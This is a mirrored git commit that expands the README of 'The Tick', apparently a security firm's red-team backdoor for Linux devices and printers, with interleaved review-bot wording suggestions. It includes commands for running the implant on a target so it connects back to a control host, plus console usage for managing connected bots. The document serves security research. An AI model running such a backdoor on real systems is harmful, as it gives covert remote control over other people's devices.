mirror of https://github.com/nccgroup/thetick.git synced 2023-12-14 04:33:00 +01:00

Added 44Con presentation + expanded the readme a bit. Fixes #1

MarioVilas 2019-09-27 10:51:29 +02:00
parent 576e7fc233
commit c6d26aad34


@ -14,17 +14,30 @@ sudo apt-get install libcurl-dev
Once the dependencies are installed just run the makefile:
```
cd src
make clean
make
```
When cross-compiling for supported platforms, the dependency resolution and compilation is done automatically for you. Currently the only supported cross-compiling platform is the Lexmark CX310DN printer. Consult the sources for more details.
Once the "make" command has run to completion, the compiled binary can be found at the "bin" folder. This is the binary you want to run on your target machine to control it remotely.
When cross-compiling for supported platforms, the dependency resolution and compilation is done automatically for you. Currently the only supported cross-compiling platform is the Lexmark CX310DN printer, but more devices will be added later. Consult the makefile for more details.
The command and control console is written in Python and therefore needs not be compiled.
## Installing
Obtaining persistence on the backdoor will depend heavily on the target platform, and therefore is not documented here.
The control console requires no installation, but may have unresolved dependencies. Run the following command to ensure all dependencies are properly installed (note this does not need sudo):
On the target machine, run the backdoor binary with the following arguments:
```
./ticksvc ADDR PORT
```
Where "ADDR" and "PORT" must be replaced by the IP address and port where the command and console will be listening. The default port is 5555.
The command and control console requires no installation, but may have unresolved dependencies. Run the following command to ensure all dependencies are properly installed (note this does not need sudo):
```
pip install --upgrade -r requirements.txt
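Review bot: The sentence following `./ticksvc ADDR PORT` says "where the command and console will be listening", which drops the word "control"; the surrounding text calls it the "command and control console", so use that wording here too. The same sentence states that the default port is 5555 while the usage line shows PORT as a plain positional argument, so the README should say whether PORT can be omitted and, if so, mark it as optional in the usage line. Also, "can be found at the "bin" folder" reads better as "in the "bin" folder", and the remark that pip "does not need sudo" would be clearer if it said where the packages are expected to land (for example a virtualenv or the user site directory).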
@ -56,10 +69,31 @@ To run the backdoor binary on the target platform, set the control server hostna
./ticksvc control.example-domain.com 5555
```
At the control server, you may want to run the console inside a GNU screen instance or similar. Here are a few screenshots illustrating what the console is capable of:
At the control server, you may want to run the console inside a GNU screen instance or similar:
```
sudo apt-get install screen
screen -S thetick ./thetick.py
```
That way you can detach from the console by pressing Control+A followed by D. You can return to the console later like this:
```
screen -r thetick
```
The console will let you know when a new bot connects to it. Use the "bots" command to show the currently connected bots, and the "use" command will select a bot to work with. The "help" command shows the user manual.
Here are a few screenshots illustrating what the console is capable of:
Command line switches
![Screenshot 2](doc/screenshot-banners.png "Screenshot")
Interactive console help
![Screenshot 3](doc/screenshot-help.png "Screenshot")
## Media
The Tick has been referenced in the following 44Con presentation by Daniel Romero and Mario Rivas:
[![](http://img.youtube.com/vi/plu7U0Sq9HQ/0.jpg)](http://www.youtube.com/watch?v=plu7U0Sq9HQ "Office Equipment: The Front Door To Persistence On Enterprise Networks - D. Romero and M. Rivas")
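Review bot: Both URLs in the Media entry at the end of this hunk use http:// (the img.youtube.com thumbnail and the www.youtube.com link); switch them to https:// so the README does not load the image or send readers over plaintext. The thumbnail is written as `[![](...)`, which leaves the alt text empty, so give it a short description such as the talk title. In the screenshots list the visible alt texts are "Screenshot 2" and "Screenshot 3", so check that the numbering still matches the images the README actually contains.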